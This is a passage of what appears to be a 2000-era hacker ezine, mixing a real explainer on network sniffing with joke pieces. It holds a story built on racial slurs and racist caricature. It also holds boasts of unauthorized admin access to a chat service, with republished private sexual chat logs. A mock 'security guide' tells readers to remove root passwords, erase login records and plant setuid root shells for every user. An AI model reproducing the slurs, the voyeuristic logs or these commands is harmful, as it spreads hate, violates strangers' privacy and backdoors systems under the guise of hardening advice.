drop this guys docs. Everyone logs in and runs their own elite viruses that do
funky stuff like eat stuff and have sex with each other. Then, soon the Gibson
cant handle all the processes and crashes, thereby hacking the planet from this
guy, killing his virus, and getting the money! Hell yeah! Only problem is that
we dont have enough elite programs, so we have to write some. First we'll go
with the "replicating" or fuckmonkey program. Save it as fuckmonkey.pl and chmod
+x it.
#!/bin/bash/perl
$blah = cos(3.35235233);
while( 1 ); {
$blah=cos($blah);
`~/fuckmonkey.pl' }
#---end---#
Now just run that sucker on the Gibson (assuming it has perl installed). Hack
the planet! So now that we crashed the Gibson and took over the bank account
(long unnecessary story involving tak giving a lot of head), were rich and
sitting on top of the world. I dont want to bore you with the whole taking over
the government etc thing, the main point is we hacked the Gibson, now we own the
world. Of course bullies still kick bob's ass but thats a different story
entirely.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[10:. - [ Sniffing and spoofing explained ] [psyops] :. ]
[psyops@phault.org] :. ]
____________________________________________________________________
Introduction.
Sniffing and spoofing are security threats that target the
lower layers of the networking infrastructure supporting
applications that use the Internet. Users do not interact
directly with these lower layers and are typically
completely unaware that they exist. Without a deliberate
consideration of these threats, it is impossible to build
effective security into the higher levels.
Sniffing is a passive security attack in which a machine
separate from the intended destination reads data on a
network. The term "sniffing" comes from the notion of
"sniffing the ether" in an Ethernet network and is a bad
pun on the two meanings of the word "ether."
Passive security attacks are those that do not alter the
normal flow of data on a communication link or inject data
into the link.
Spoofing is an active security attack in which one machine
on the network masquerades as a different machine. As an
active attack, it disrupts the normal flow of data and may
involve injecting data into the communications link between
other machines. This masquerade aims to fool other machines
on the network into accepting the impostor as an original,
either to lure the other machines into sending it data or
to allow it to alter data. The meaning of 'spoof' here is
not 'a lighthearted parody,' but rather 'a deception intended
to trick one into accepting as genuine something that is
fake.' Such deception can have grave consequences because
notions of trust are central to many networking systems.
Sniffing may seem innocuous (depending on just how sensitive
and confidential you consider the information on your network),
some network security attacks use sniffing as a prelude to
spoofing. Sniffing gathers sufficient information to make
the deception believable.
Sniffing.
Sniffing is the use of a network interface to receive data
not intended for the machine in which the interface resides.
A variety of type of machines need to have this capability.
A token-ring bridge, for example, typically has two network
interfaces that normally receives all packets travelling on
the media on one interface and retransmit some, but not all,
of these packets on the other interface. Another example of
a device that incorporates sniffing is one typically marketed
as a 'network analyzer.' A network analyzer helps network
administrators diagnose a variety of obscure problems that
may not be visible on any one particular host. These problems
can involve unusual interactions between more than just one
or two machines and sometimes involve a variety of protocols
interacting in strange ways.
Devices that incorporate sniffing are useful and necessary.
However, their very existence implies that a malicious person
could use such a device or modify an existing machine to
snoop on network traffic. Sniffing programs could be used to
gather passwords, read inter-machine e-mail, and examine
clien-server database records in transit. Besides these high
level data, lowlevel information might be used to mount an
active attack on data in another computer system.
Sniffing: How It Is Done.
In a shared media network, such as Ethernet, all network
interfaces on a network segment have access to all the data
that travels on the media. Each network interface has a
hardware-layer address that should differ from all hardware-layer
addresses of all other network interfaces on the network. Each
network also has at least on broadcast address that corresponds
not to an individual network interface, but to the set of all
network interfaces. Normally, a network interface will only
respond to a data frame carrying either its own hardware-layer
address in the frame's destination field or the 'broadcast address'
in the destination field. It responds to these frames by generating
a hardware interrupt to the CPU. This interrupt gets that attention
of the operating system, and passes the data in the frame to the
operating system for further processing.
At times, you may hear network administrators talk about their
networking troubles spots---when they observe failures in a
localized area. They will say a particular area of the Ethernet
is busier than other areas of the Ethernet where there are no
problems.
All of the packets travel through all parts of the Ethernet segment.
Interconnection devices that do not pass all the frames from one side
of the device to the other form the boundaries of a segment. Bridges,
switches, and routers divide segments from each other, but low-level
devices that operate on one bit at a time, such as repeaters and hubs,
do not divide segments from each other. If only low-level devices
separate two parts of the network, both are part of a single segment.
All frames travelling in one part of the segment also travel in the
other part.
The broadcast nature of shared media networks effects network
performance and reliability so greatly that networking professionals
use a network analyzer, or sniffer, to troubleshoot problems.
A sniffer puts a network interface in promiscuous mode so that
the sniffer can monitor each data packet on the network segment.
In the hands of an experienced system administrator, a sniffer
is an invaluable aid in determining why a network is behaving
(or misbehaving) the way it is. With an analyzer, you can determine
how much of the traffic is due to which network protocols, which
hosts are the source of most of the traffic, and which hosts are
the destination of most of the traffic. You can also examine data
travelling between a particular pair of hosts and categorize it by
protocol and store it for later analysis offline. With a sufficiently
powerful CPU, you can also do the analysis in real time.
Most commercial network sniffers are rather expensive, costing
thousands of dollars. When you examine these closely, you notice
that they are nothing more than a portable computer with an Ethernet
card and some special software. The only item that differentiates
a sniffer from an ordinary computer is software. It is also easy to
download software and freeware sniffing software from the Internet
or various bulleting board systems.
The ease of access to sniffing software is great for network
administrators because this type of software helps them become better
network troubleshooters. However, the availability of this software
also means that malicious computer users with access to a network
can capture all the data flowing through the network. The sniffer
can capture all the data for a short period of time or selected
portions of the data for a fairly long period of time. Eventually,
the malicious user will run out of space to store the data---the
network I use often has 1000 packets per second flowing on it.
Just capturing the first 64 bytes of data from each packet fills
up my system's local disk space within an hour.
Sniffing Passwords.
Perhaps the most common loss of computer privacy is the loss of
passwords. Typically users type a password at least once a day.
Data is often thought of as secure because access to it requires
a password. Users usually are very careful about guarding their
password by not sharing it with anyone and not writing it down
anywhere.
Passwords are used not only to authenticate users for access to
the files they keep in their private accounts but other passwords
are often employed within multilevel secure database systems.
When the user types any of these passwords, the system does not
echo them to the computer screen to ensure that no one will see
them. After jealously guarding these passwords and having the
computer system reinforce the notion that they are private, a
setup that sends each character in a password across the network
is extremely easy for any Ethernet sniffer to see. End users
do not realize just how easily these passwords can be found
by someone using a simple and common piece of software.
Sniffing Financial Account Numbers.
Most users are uneasy about sending financial account numbers,
such as credit card numbers and checking account numbers, over
the Internet. This apprehension may e partly because of the
carelessness most retailers display when tearing up or returning
carbons of credit card receipts. The privacy of each user's credit
card numbers is important. Although the Internet is by no means
bulletproof, the most likely location for the loss of privacy
to occur is at the endpoints of the transmission. Presumably,
businesses making electronic transactions are as fastidious about
security as those that make paper transactions, so the highest
risk probably comes from the same local network in which the
users are typing the passwords.
However, much larger potential losses exist for businesses that
conduct electronic funds transfer or electronic document interchange
over a computer network. These transactions involve the transmission
of account numbers that a sniffer could pick up; the thief could
then transfers funds into his or her own account or order goods
paid by a corporate account. Most credit card fraud of this kind
involves only a few thousand dollars per incident.
Sniffing Private Data.
Loss of privacy is also common in e-mail transactions. Many e-mail
messages have been publicized without the permission of the sender
or receiver. Remember the Iran-Contra affair in which President
Reagan's secretary of defence, Caspar Weinberger, was convicted.
A crucial piece of evidence was backup tapes of PROFS e-mail on
a National Security Agency computer. The e-mail was not intercepted
in transit, but in a typical networked system, it could have been.
It is not at all uncommon for e-mail to contain confidential business
information or personal information. Even routine memos can be
embarrassing when they fall into the wrong hands.
Sniffing Low-Level Protocol Information.
Information network protocols send between computers includes
hardware addresses of local network interfaces, the IP address of
remote network interfaces, IP routing information, and sequence
numbers assigned to bytes on a TCP connection. Knowledge of any of
this information can be misused by someone interested in attacking the
security of machines on the network.
A sniffer can obtain any of these data. After an attacker has this
kind of information, he or se is in a position to turn a passive
attack into an active attack wit even greater potential for damage.
Protocol Sniffing: A Case Study.
At one point in time, all user access to computing facilities in the
organization under study (the university at which the author is
employed) was done via terminals. It was not practical to hardwire
each terminal to the host, and users needed to use more than one host.
To solve these two problems, Central Computing used a switch (an AT&T
ISN switch) between the terminals and the hosts. The terminals
connected to the switch so that the user had a choice of hosts. When
the user chose a host to switch connected the terminal to the chosen
host via a very real, physical connection. The switch had several
thousands ports and was, in theory, capable of setting up connections
between any pair of ports. In practical, however, some ports attached
to terminals and other ports attached to hosts.
To make the system more flexible, the central computing facility was
changed to a new system that uses a set of (DEC 550) Ethernet terminal
servers with ports connected to the switch, rather than the old
system, which used a fixed number of switch ports connected to each
host. The new terminal servers are on an Ethernet segment by the hosts
in the central machine room.
Offices have a cable running from a wallplate to a wiring closet
punchdown block. The punchdown block has cables running to
multiplexers which turn connect to the switch. The multiplexers serve
to decrease the number of cables that need to be long. With this
arrangement sniffing or other form of security problems are not an
issue. No two offices share any media.
The switch mediates all interaction between computers, isolating the
flow of data away from the physical location of the end users.
Rather than using simple terminals, however, most computer users have
a computer on their desktop that they use in addition to the Central
Computing computers. The switch services these computers as well as
simple terminals. The number of computer users, however, has grown
rapidly over the past decade and the switch is no longer adequate.
Terminal ports are in short supply, host ports are in even shorter
supply, and the switch does not supply particularly high-speed
connections.
To phase out the switch, Central Computing installed an Ethernet hub
in the basement of each building next to the punchdown block used to
support both the switch multiplexer and the telephone lines. The hubs
in the basement connect to the central facility using fiber-optic
cables to prevent signal degradation over long distances. Hubs also
were placed in the wiring closets on each floor of each building that
connected to the basement hub. Now the cables leading to the
wallplates in the offices are being moved from the punchdown block
that leads to the multiplexer to a punchdown block that leads to one
of these hubs. The new wiring scheme neatly parallels the old and was
changed relatively inexpensively.
Although the new wiring scheme neatly parallels the old, the data
travelling on the new wiring scheme does not neatly parallel its
previous path. From a logical standpoint, it can get to the same
places, but the data can and does go to many other places as well.
Under this scheme, any office can sniff on all the data flowing to
Central Computing from all of the other offices in the building.
Different departments are located in the same building. These
departments compete for resources allocated by uppermanagers that
supervise them, and middle management all are located in the same
building. A fair amount of potential exists for employees to want to
know what other people are sending in e-mail messages, storing in
personnel files, and storing in project planning files.
In addition to nosiness and competition, a variety of people sharing
the same physical media in the new wiring scheme, could easily misuse
the network. Since all occupants of a building share a single set of
Ethernet hubs, they broadcast all of their network traffic to every
network interface in the entire building. Any sensitive information
that they transmit is no longer limited to a direct path between
user's machine and the final destination, anyone in the building can
intercept the information with a sniffer. However, some careful
planning of network installation or a redesign of an existing
network should include security considerations (as well as performance
issues) to avoid the risks inherent in shared media networking.
The network in the case study fails miserably in the prevention of
sniffing. Any computer in a building is capable of sniffing the
network traffic to or from any other computer in the building.
Feedback would be nice <psyops@phault.org>.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
...........................................
...#""""""#................................
..." ~ ~ "................................
..( 0 0 ).. /------------------------\..
...| <> |... | tak will have sex with |..
...| /""\ |...< a_kitten, blueberry, |..
...| ____ |... | justagirl, jericho, jp |..
...|| ||... | and rloxley at defcon! |..
....\¯¯¯¯/.... \------------------------/..
......||...................................
____________________________________________________________________
[11:. - [ Teenage Mutant Nigger Turtles part 2] [chris] :. ]
[chris@b0g.org] :. ]
____________________________________________________________________
Foreword
Welcome back to the final installment of the Teenage Mutant Nigger Turtles
miniseries. We last left off with our two remaining turtles being shoved into
the trunk of Jerry Curl's buick and being hauled off to his plantation. Let's
get back to the action..
Teenage Mutant Nigger Turtles
Teenage Mutant Nigger Turtles
Teenage Mutant Nigger Turtles
Niggers smoking crackpipes..
Turtle power!
They're the world's most trashy, scumbag team (We're really hip!)
They're niggers in a half-shell, they're not clean (Hey - get a grip!)
When the evil ShitNigga attacks
These Turtle boys shoot him in the back!
Teenage Mutant Nigger Turtles..
Teenage Mutant Nigger Turtles..
Splinter-X taught them to be a ninja team! (He's a radical Paki!)
Coonatello deals, LowRideO pimps his steel! (That's a fact, Jack!)
Crackael is a nigger jew! (Gimme a break!)
MickeyJiggalo is a nigger too! (Party!)
Teenage Mutant Nigger Turtles
Teenage Mutant Nigger Turtles
Teenage Mutant Nigger Turtles
Niggers smoking crackpipes..
Turtle power!
Scene 4 - Jerry Curl's Plantation
Coonatello and LowRideO look around in horror as they see thousands of blackies
working on the plantation. Their huge lips hang below their chin as they stare
open mouthed at the operation. Suddenly a a set of hands grips each of their
shoulders like vice clamps. They spin around and stare up at the biggest
creatures they have ever seen.
Jerry Curl: Ah, I see you've met 8-ball and Crackbaby. They'll be making sure
you keep up your end of the bargin. If not..
As his voice trails off, the two monsters bring out a set of whips lined with
sharp pieces of metal.
Jerry Curl: ..If not, we'll have to punish you. Of course, I'll have to seperate
you two, I don't need anyone causing any trouble. LowRideO - You'll be taking
the west side of the plantation and Coonatello will be taking the east side.
Immediately, as if some sort of power had over taken them, Coonatello and
LowRideO began to feud on who's side was better.
LowRideO: West Siiiiiide!
Coonatello: East Siiiideeee, motha fucka!
Laughing, Jerry Curl orders his goons to take them away.
4 hours later...
Too tired to work any further, LowRideO sits down to catch his breath. A sound
of thunder breaks the erie silence. Then, he's hit with a slicing pain on his
back. The whip, he thought in agony. 8-ball's distorted face appears over
LowRideO. Suddenly, they are both cast in shadow.
<THWACK!>
8-ball is thrown to the ground by a tremendous force. In surprise, he lets out a
snort and glances up in the hot sun. He sees a slightly out of shape, older man,
with the word 'b0g' on his tight spandex outfit, staring down at him.
8-ball: Duhh.. duh.. Super Bob! Duh.. I'm sorry, is dees your friends?
Super Bob: That's right, now step aside you pussy. I have work to do.
Super Bob lifts LowRideO off the ground and zooms into the air.
Super Bob: Let's go save Coonatello and get out of here.
As Bob draws nearer to the East side of the plant, the sun does likewise with
the horizon. Twisted, contorted shadows align the plant's features, casting many
things in blackness.
Super Bob: Have no fear! I have super b0g vision!
Navigating his way around like it was daylight, Bob easily locates Coonatello
and lands to the ground with a thud.
Coonatello: Bob? You came and saved me after what happened with us..
Super Bob: Yes, you didn't thing I'd leave you here, did y--
<THUD>
Bob is suddenly clubbed in the head with a heavy object. Shakily, he whips
around to see Crackbaby holding a rock (boulder might be the correct word here)
in his hands. Bob stands up, and smiles at Crackbaby.
Super Bob: Dare you challenge my b0g powers? Dear boy.. you've messed with the
wrong person.
Bob grabs on to Crackbaby's testicles and rips them away.
<slurp>
All of a sudden, Crackbaby emits an ear piercing (high pitched) scream. He then
falls to the ground with blood gushing from his extremities.
The lights on the plant turn on in sequence to the event, and Jerry Curl's voice
occupies the megaphone.
Jerry Curl: You have 10 seconds to return to your work before the dogs are
released. I repeat, you have 10 seconds.. before you are ripped to shreds.
Super Bob: I call that move the Super b0g ball buster.
LowRideO: Thanks bob, I owe you one.
Coonatello: Yeah me too..
Coonatello: Oh, and LowRideO man, sorry for fighting earlier
(Jerry Curl: 4.. 3..)
LowRideO: It's okay man, lets get the fuck out of here.
With a wink, Bob lifts Coonatello and LowRideO high into the air, and they zoom
away high above the plant just as the dogs are released.
With that, Bob drops them both to their doom.
With a wide grin, he calls out as they are being ripped to shreds by the dogs..
Super Bob: Next time.. don't steal my issue of b0g you fuckers!
And so ends the adventures of the Teenage Mutant Nigger Turtles. Hope you
enjoyed it.
Author's Note: These two articles were in no way meant to offend black people. I
am not racist, they were simply written for fun. If anyone had a problem with
them, I apologize. Thanks for reading.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[12:. - [ hacking for cybersex ] [nathan] :. ]
[nathan@b0g.org] :. ]
____________________________________________________________________
Am I leet now?
One day I got a message from some guy wanting to hack ichat servers. He wanted
to know how to exploit a server using the room(4001) exploit. I laughed at him,
but not before he told me about Warnerbros chat. I had gone here before, but
never had any luck w/ getting admin. Anyway..blah blah. I got admin, and started
watching people have sex.:
Our 1st one is with some guy from South America, and some chick.
He wants it, and she doesn't really care. Kinda funny what happens in the end
=============================================================================
guest1006 says, "wanna cyber s ex????........" /* Wow..kinda blunt, eh? */
guest1006 smiles hopefully
guest1111 says, "you start it"
guest1006 says, "kool"
guest1006 kisses your neck slowly
guest1111 says, "licking your body all over"
guest1006 grabs your butt
guest1111 says, "going down"
guest1006 pushes you to the bed
guest1006 says, "I am a poor pick up artist?"
guest1006 says, "why do you think so?"
guest1006 says, "oops"
guest1006 says, "I am a poor pick up artist?"
guest1006 says, "............"
guest1006 says, "what the"
guest1111 says, "rubbing you up and down and all around"
guest1006 says, "what are you"
guest1006 says, "wearing"
guest1111 says, "thongs"
guest1111 says, "andd you?"
guest1006 says, "im sorry my english is pretty forgotten, what is thongs?"
/*foreign guy*/
guest1111 says, "leopard ones too"
guest1111 says, "the underwear that goes up your but"
guest1111 says, "butt oops"
guest1006 nod
guest1006 says, "ok, im wearing a shirt and shorts"
guest1111 says, "weell i ripped them off now"
guest1111 says, "well"
guest1111 says, "oops"
guest1006 tears all your clothes
guest1006 brakes your bra in 2 and take it off
guest1111 says, "ooh big tits in your mouth"
guest1006 sucks your tits
guest1006 says, "whats your name?"
guest1111 says, "licks your dick"
guest1111 says, "bringing out the strawberries and the whipped cream"
guest1006 says, "what is your name????????"
guest1111 says, "are you ready to lick them off"
guest1111 says, "chrissy and you?"
guest1006 licks off everything
guest1006 says, "Mike"
guest1006 sucks your *****
guest1111 says, "chrissy iss chanting mikes name in the bed"
guest1006 sucks your **** y hard
guest1111 says, "stick it in"
guest1111 says, "baby"
guest1006 puts my dick in your mouth and starts doing 69
guest1006 turns you upside down
guest1006 penetrates your butt hard
guest1111 says, "and starts to boounce"
You tell skream, "lmfao!!!"
guest1006 pushes harder and faster
guest1111 says, "ooh\"
guest1006 grabs your wrist and pulls you in
guest1111 says, "oohh baby i like it rough"
guest1006 pushes hard
guest1111 says, "harder baby harder"
guest1006 pushes harder and harder each time
guest1111 says, "good cause i like it that way"
guest1006 turns you around and spreads your legs
guest1006 opens them wide
guest1111 says, "real wide"
guest1006 gets on top of you and pentetrates your pussy hard
guest1111 says, "well i've had enough it hurts now?" /* haha..poor girl */
guest1006 says, "hurts what?"
guest1006 says, "tired already?"
guest1111 leaves.
You say, man.."
guest1006 leaves, heading for Buffy.
You say, that sucks"
=============================================================================
=============================================================================
Our next one is a little better. At least, both people want it this time.
I walked right into this one. Boy was i pleased. Enjoy...
=============================================================================
guest925 kises him while being held
Romeo20 kisses her slowly and lovingly
guest925 takes her top off
Romeo20 says, "whats under the top??"
guest925 says, "a bra"
Romeo20 says, "oh okay"
guest925 kisses u again
Romeo20 takes his shirt off
Romeo20 kisses her again
guest925 takes her bra off
Romeo20 says, "okay now no farther then this for tonight okay"
guest925 says, "why?"
Romeo20 says, "i dont know aww screw it go as far as you want"
Romeo20 smiles
guest925 says, "u wont go with me though"
Romeo20 says, "hell no I'll go as far as you want baby"
guest925 kissesu again and again
Romeo20 holds her close to him and kisses her chest softly
guest925 takes his pants off
Romeo20 takes her pants off
guest925 takes his underwear off
Romeo20 puts his hand down her underwear and starts to finger her slowly
guest925 enjoys it
Romeo20 pulls for her underwear
Romeo20 enjoys it too
guest925 lets him
Romeo20 fingers her a bit faster
guest925 kisses him faster
Romeo20 puts her hand on his rolodex
Romeo20 says, "on his p e n i s"
guest925 and touches it with pleasure
Romeo20 fingers her really fast
guest925 touches him more and more
Romeo20 grabs his p e n i s and sticks it in her p u s s y
guest925 lets him
Romeo20 starts too move up and down slowly
guest925 does the same while kissing him
Romeo20 loves the feel of her wet soft p u s s y
guest925 loves the feel of him inside of her
Romeo20 moves up and down fast trying to loosen up her tight c u n t
guest925 wants him
guest925 kisses him
guest925 touches him
Romeo20 want her for reals
guest925 hugs him
Romeo20 hugs her tight
guest925 wants him for real
guest925 kisses him more
guest925 and more
guest925 yells i want more
Romeo20 starts to move up and down real fast
guest925 starts to kiss him more and more
Romeo20 starts to fuck her real hard
Romeo20 starts to screw her real hard
guest925 rols onto the floor
Romeo20 screws her as fast as he can then stops and blows his loan all inside
of her
Romeo20 his be realinside of her
Romeo20 says, "dang it"
guest925 screws him back real hard
guest925 kisses him,
guest925 wants him
Romeo20 comes inside of her
You say, I'm Nathan and I come with correction. You know there's infection, so
wear some protection"
guest925 says, "what"
Romeo20 says, "i dont know"
guest925 stops for a second
guest925 and just kisses him
Romeo20 has to stop his you know what is sour
guest925 says, "in real life???????!!!!"
Romeo20 says, "no but I'm harder then crud "
You say, well...it's been real nice guys...have fun..."
=============================================================================
=============================================================================
The next day, Warnerbros chat was patched, and I no longer had admin.
But boy was this fun. I still have admin to a chat that caters to 12 year olds,
but I don't think I'll catch them cybering any time soon.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[13:. - [ How to NOT get owned by Prae ] [timidu] :. ]
[timidu@b0g.org] :. ]
____________________________________________________________________
"-My fucking GOD! I've been hacked by Prae!@#$@#$# ! I wanna kill
myself ! >:/"
You can hear that pretty often these days as Prae is an 31337 h4x0r
and he'll root you in just a second.
This guide is meant to help Linux and Internet newbies to avoid not
getting hacked by this hack-est , the Emperor of the Hackers , the guy
that can root you with only a spoon and a peach-leaf , his Majesty
Prae from b0g. Here is a log with what I do every time I reinstall
Linux on my box that was NEVER hacked by Prae (and will never be as I
IRC spoofed cuz Im lame)
Following these lines step by step will totally secure you and Prae
won't , for sure , root you.
Mandrake Linux release 7.0 (Air)
Kernel 2.4.0-test2 on a i386
sekurebox login: root
Password:
Last login: Sun Jun 25 20:07:24 on tty4
You have mail.
[root@sekurebox /root]# passwd -d root
Changing password for user root
Removing password for user root
passwd: Success
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue.net
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue
[root@sekurebox /root]# logout
Enter root login and enjoy!@#@#$
sekurebox login: root
Last login: Tue Jun 27 16:43:54 on tty1
You have mail.
[root@sekurebox /root]# echo 'This box has no root password set<br>'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set<br>'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set<br>'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set' >>
/home/httpd/html/index.htm
[root@sekurebox /root]# mail -s "Telnet over here" prae@b0g.org
hey .. check out my box man
Cc: ^D[root@sekurebox /root]#
[root@sekurebox /root]# BitchX -c \#k-rad -n TelnetMe
toronto.on.ca.undernet.org&
[1] 764
[root@sekurebox /root]# BitchX - Based on EPIC Software Labs epic
ircII
(1998).
Version (BitchX-1.0c16) -- Date (19990221).
Process [764]
Using terminal type [linux]
[1]+ Stopped (tty output) BitchX -c \#k-rad -n TelnetMe
toronto.on.ca.undernet.org
[root@sekurebox /root]# rm -f /var/log/wtmp
[root@sekurebox /root]# touch /var/log/wtmp
[root@sekurebox /root]# last root
wtmp begins Tue Jun 27 19:07:27 2000
[root@sekurebox /root]# sleep 360000
Meanwhile .. on Prae's box
[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:10 ...
Prae , pumpkin , it's dinner time
EOF
[root@PraeScilla /root]# echo "But Im not hungry , mommy!" | write
mom
[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:14 ...
Hmm .. I thought you learnt your lesson the other day when I hit you
with the brand new whip that i've purchased
EOF
[root@PraeScilla /root]# echo "Ok , mom , pls not the whip again , Im
comin' in 5 mins ; just lemme read my e-mails" | write mom
[root@PraeScilla /root]# ssh -l prae b0g.org
prae@b0g.org's password: (what could it be?)
Last login: XXXXXXXXXXXXXXXXX
You have new mail.
[prae@b0g ~]$ cat $MAIL
>From root@sekurebox.net Tue Jun 27 16:50:58 2000
Return-Path: <root@sekurebox.net>
Received: (from root@sekurebox.net)
by sekurebox.net (8.9.3/8.9.3) id QAA00740
for prae@b0g.org; Tue, 27 Jun 2000 16:50:58 -0400
Date: Tue, 27 Jun 2000 16:50:58 -0400
From: root <root@sekurebox.net>
Message-Id: <200006272050.QAA00740@sekurebox.net>
To: prae@b0g.org
Subject: Telnet over here
Status: RO
X-Status:
X-Keywords:
X-UID: 2
hey .. check out my box man
[prae@b0g ~]$ HaHaHaH .. I ROOT YOUR BOX .. YOU LAMER!#$@$%@%$
bash: HaHaHaH: command not found
[prae@b0g ~]$ 8u7 Wh47 7H3 fuq 15 7h15 b0x
bash: 8u7: command not found
[prae@b0g ~]$ cat $MAIL | grep 'Subject' | awk -F':' '{print $2}'
Telnet over here
[prae@b0g ~]$ ahhhh
bash: ahhhh: command not found
[prae@b0g ~]$ telnet
telnet> over here
?Invalid command
telnet> open over here
over: Host name lookup failure
telnet> quit
[prae@b0g ~]$ BOY , I SUCK!!!!!!!!!!! :((((((((((
BOY , I SUCK!!!!!! :((((((((((
bash: syntax error near unexpected token `:(('
[prae@b0g ~]$ logout
[root@PraeScilla /root]# su learntime
[learntime@PraeScilla ~]$ mesg n
[learntime@PraeScilla ~]$ less `locate script-kiddy-HOWTO` && lynx
www.antionline.com && lynx www.2600.org && BitchX -c \#hack
toronto.on.ca.undernet.org
[learntime@PraeScilla ~]$ su -
Password:
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]# /sbin/lilo -D=dos
[root@PraeScilla /root]# adios , dear Linux , but Im too lame to use
you
>
[root@PraeScilla /root]# reboot
This won't really happen (at least Im not sure for it) but you can
check yer logz that Prae didn't penetrate you (your system , I mean ,
I don't know if he actually penetrated you ;)
[root@sekurebox /root]# last root
wtmp begins Tue Jun 27 19:07:27 2000
See? You're totally safe!@#$@ Thank me! Praise me! Cherish me!@#$@#
These are just a few methods of protecting yourself. You can increase
security in many ways ....
I usually make this cool script
--- cut here ---
#!/bin/bash
for I in `cat /etc/passwd | awk -F':' '{print $1}'`
do
passwd -d $I
cp /bin/bash /home/$i
chmod a+s /home/$i/bash
echo "./bash" >> /home/$i/.bash_profile
done
--- stop cutting ---
If you find this guide useful then Ill continue releasing these
invaluable advises that every admin should follow
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[14:. - [ The disk trick ] [shadowwolf] :. ]
[shadowwolf@progen.zzn.com] :. ]
____________________________________________________________________
Ok, so you have something important written down on a piece of paper, but
you don't know where to hide it (password, phone number, message ect.). Get a
3.5" floppy disk (Definition for the computer illiterate: The little square disk
you put into your computer) and take a small thin flat-head screw driver and
carefully take off the metal slide on the disk by putting the screw driver in
the space between the two halves of the plastic cover and just pop it off. Now
carefully pry the two halves of the disk apart. Now take out the disk media
(Definition for the computer illiterate: The round plastic thing with the metal
piece in it). Now look at the half of the disk casing with the hole in it (as
shown below). Where it says "Tape Paper Here" tape you message, number,
password, ect on a piece of paper. Always tape above the hole or you will be
able to see the paper on the outside of the disk.
_________________
| |
| Tape Paper Here |
| |
| /---\ |
| | | |
| \---/ |
| |
| |-| |
| | | |
|_______|_|_______|
Now put the disk media back and snap the disk back together. Now take a
disk label and instead of putting it on the front of the disk, fold about 1/3 of
it over the top seam of the disk as to act like a hinge whenever you need to
open it. Then slide the metal piece back onto the disk and there you have it!
Now to open it just take of the metal piece and flip it open!
This works well for remembering your passwords and also passing messages
to fellow ninja hackers :-)
|============|
|[Shout outs]|
|============|
The Maniac (blackcode.com ezine creator), Jason Scott (founder and webmaster of
http://www.textfiles.com), proctologist, sublime929, deathtoyerm o M,
PinkBarbieRawks1, and CApToRofSiN16.
And a special shout out to all of the Anarchists of the world.
_____________________
*!!!ANARCHY RULEZ!!!*
Send all comments, thanx, questions, or insults to.....
